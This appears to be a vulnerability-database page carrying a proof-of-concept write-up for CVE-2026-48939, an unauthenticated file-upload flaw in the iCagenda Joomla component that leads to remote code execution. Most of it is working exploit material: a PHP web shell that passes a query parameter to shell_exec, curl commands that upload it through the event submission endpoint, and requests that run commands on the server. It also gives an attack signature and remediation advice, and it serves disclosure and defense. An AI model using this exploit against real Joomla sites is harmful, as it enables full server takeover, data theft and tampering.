| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| Exploit for CVE-2026-48939 | 29 Jun 202611:09 | โ | githubexploit | |
| CVE-2026-48939 | 20 Jun 202611:56 | โ | attackerkb | |
| CVE-2026-48939 | 20 Jun 202613:44 | โ | circl | |
| CVE-2026-48939 | 20 Jun 202611:56 | โ | cve | |
| CVE-2026-48939 Joomla Extension - icagenda.com - Remote Code Execution in iCaganda extension for Joomla < 4.0.8/3.9.15 | 20 Jun 202611:56 | โ | cvelist | |
| EUVD-2026-38109 | 20 Jun 202611:56 | โ | euvd | |
| CVE-2026-48939 | 20 Jun 202613:16 | โ | nvd | |
| PT-2026-51137 | 20 Jun 202600:00 | โ | ptsecurity | |
| CVE-2026-48939 Joomla Extension - icagenda.com - Remote Code Execution in iCaganda extension for Joomla < 4.0.8/3.9.15 | 20 Jun 202611:56 | โ | vulnrichment |
# CVE-2026-48939 - iCagenda Unauthenticated File Upload to RCE
## Overview
| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2026-48939 |
| **CVSS 4.0 Score** | 10.0 Critical |
| **CVSS Vector** | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| **CWE** | CWE-284: Improper Access Control |
| **Affected Versions** | iCagenda 3.2.1 - 3.9.14 and 4.0.0 - 4.0.7 |
| **Fixed In** | iCagenda 4.0.8 and 3.9.15 |
| **Published** | 20 June 2026 |
## Vulnerability Description
iCagenda, a popular events and calendar component for Joomla, contains an unauthenticated file upload vulnerability that allows remote attackers to upload and execute arbitrary PHP code on Joomla 6 sites.
### Technical Details
The vulnerability exists in the frontend event submission form's file attachment feature:
1. **Missing Access Control**: The submit endpoint (`index.php?option=com_icagenda&task=registration.submit`) does not enforce authentication, bypassing the "Registered Only" access setting.
2. **No File Validation**: Uploaded files are saved with their original extension without:
- Extension allowlist validation
- MIME type verification
- File content inspection
3. **Direct File Write**: Files are written to `/images/icagenda/frontend/attachments/[filename]` directly under the web root.
4. **PHP Execution**: On Joomla 6, the uploaded `.php` files are executable, leading to Remote Code Execution (RCE).
## Proof of Concept
### Method 1: Using curl (Single Command)
```bash
# Create PHP shell payload
cat > /tmp/shell.php << 'EOF'
<?php
echo "CVE-2026-48939 - SHELL ACTIVE\n";
if(isset($_GET['cmd'])) {
echo shell_exec($_GET['cmd'] . " 2>&1");
}
?>
EOF
# Upload the shell
curl -k -s \
-F "title=Test Event" \
-F "jform[attachment]=@/tmp/shell.php;type=application/x-php" \
"https://poloss-jomola.ddev.site/icagenda_submit.php"
# Execute commands via uploaded shell
curl -k "https://poloss-jomola.ddev.site/images/icagenda/frontend/attachments/[SHELL_FILENAME].php?cmd=whoami"
```
### Method 2: Using PoC Script
```bash
# Navigate to project directory
# Run PoC script
./CVE-2026-48939-PoC.sh https://poloss-jomola.ddev.site
```
## Exploitation Steps
1. **Identify vulnerable endpoint**:
```
https://target.com/index.php?option=com_icagenda&task=submit
```
2. **Upload PHP web shell**:
```bash
curl -X POST -F "jform[attachment][email protected]" \
"https://target.com/index.php?option=com_icagenda&task=submit"
```
3. **Execute shell**:
```bash
curl "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id"
```
## Impact
- **Confidentiality**: Complete loss of confidentiality - attacker can read all files
- **Integrity**: Complete loss of integrity - attacker can modify all data
- **Availability**: Complete loss of availability - attacker can deny service
- **Remote Code Execution**: Full server compromise
## Attack Signature
Based on real-world exploitation logs, the attack signature is:
```
# Step 1: Upload
POST /index.php?option=com_icagenda&task=submit
User-Agent: icagenda-batch/1.0
Content-Disposition: form-data; name="jform[attachment]"; filename="shell.php"
# Step 2: Execute
GET /images/icagenda/frontend/attachments/shell.php?cmd=...
User-Agent: icagenda-batch/1.0
```
## Remediation
1. **Immediate**: Update iCagenda to version 4.0.8 (or 3.9.15 for legacy branch)
2. **Alternative**: Remove or rename `com_icagenda` folders temporarily
3. **Note**: Unpublishing the component does NOT protect against this vulnerability
## References
- [iCagenda Zero Day RCE - mysites.guru](https://mysites.guru/blog/icagenda-zero-day-file-upload-rce/)
- [iCagenda Official](https://www.icagenda.com/)
- [Changelog 4.0.8](https://www.icagenda.com/docs/changelog/icagenda-4-0-8)
- [CISA ADP Advisory](https://www.cisa.gov/news-events/alerts)
## Disclaimer
This PoC is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation